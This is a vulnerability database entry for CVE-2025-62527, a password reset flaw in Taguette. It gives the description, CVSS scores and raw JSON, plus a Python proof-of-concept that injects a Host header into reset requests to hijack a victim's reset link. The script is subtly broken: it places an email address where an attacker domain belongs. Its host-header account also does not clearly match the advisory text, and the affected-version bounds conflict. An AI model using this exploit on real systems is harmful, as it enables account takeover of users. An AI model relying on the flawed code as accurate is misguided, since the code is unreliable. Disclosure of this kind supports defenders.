Security Vulnerability Report
CVE-2025-62527 CVSS 7.1 HIGH

Published: 2025-10-20 20:15:38
Last Modified: 2025-10-30 17:00:06

Description

Taguette is an open source qualitative research tool. An issue has been discovered in Taguette versions prior to 1.5.0. It was possible for an attacker to request password reset email containing a malicious link, allowing the attacker to set the email if clicked by the victim. This issue has been patched in version 1.5.0.

CVSS Details

CVSS Score: 7.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:taguette:taguette:*:*:*:*:*:*:*:* - VULNERABLE
Taguette < 1.5.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-62527 PoC - Taguette Password Reset Link Hijacking
# Vulnerability: Host header injection in password reset functionality
# Affected: Taguette versions < 1.5.0
import requests

TARGET_URL = "http://target-taguette-instance.com"
ATTACKER_EMAIL = "[email protected]"
VICTIM_EMAIL = "[email protected]"


def exploit_password_reset():
    """
    Exploit the password reset functionality by injecting a malicious Host header.
    The reset link sent to the victim will contain the attacker's domain.
    """
    # Step 1: Request password reset with manipulated Host header
    reset_endpoint = f"{TARGET_URL}/reset"
    headers = {
        "Host": ATTACKER_EMAIL,  # Inject attacker's domain
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0"
    }
    data = {
        "email": VICTIM_EMAIL
    }

    # Step 2: Send the password reset request
    response = requests.post(reset_endpoint, headers=headers, data=data)
    if response.status_code == 200:
        print(f"[+] Password reset email sent to {VICTIM_EMAIL}")
        print(f"[+] The reset link now points to: {ATTACKER_EMAIL}")
        print("[+] Waiting for victim to click the malicious link...")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")

    # Step 3: When victim clicks the link, the reset token is sent to attacker
    # Step 4: Attacker uses the token to reset victim's password
    # reset_url = f"{TARGET_URL}/reset/{captured_token}"
    # new_password = "attacker_controlled_password"
    # requests.post(reset_url, data={"password": new_password})


if __name__ == "__main__":
    exploit_password_reset()

# Alternative: X-Forwarded-Host header injection
# headers["X-Forwarded-Host"] = ATTACKER_EMAIL
```

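References

https://github.com/remram44/taguette/security/advisories/GHSA-7rc8-5c8q-jr6j (Issue Tracking, Vendor Advisory)
https://gitlab.com/remram44/taguette/-/issues/331 (Issue Tracking, Vendor Advisory)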

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62527", "sourceIdentifier": "[email protected]", "published": "2025-10-20T20:15:37.573", "lastModified": "2025-10-30T17:00:06.013", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Taguette is an open source qualitative research tool. An issue has been discovered in Taguette versions prior to 1.5.0. It was possible for an attacker to request password reset email containing a malicious link, allowing the attacker to set the email if clicked by the victim. This issue has been patched in version 1.5.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-15"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:taguette:taguette:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.5.0", "matchCriteriaId": "1B5838E2-2351-49D8-9FFA-B7A2A99E9DD3"}]}]}], "references": [{"url": "https://github.com/remram44/taguette/security/advisories/GHSA-7rc8-5c8q-jr6j", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}, {"url": "https://gitlab.com/remram44/taguette/-/issues/331", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}]}}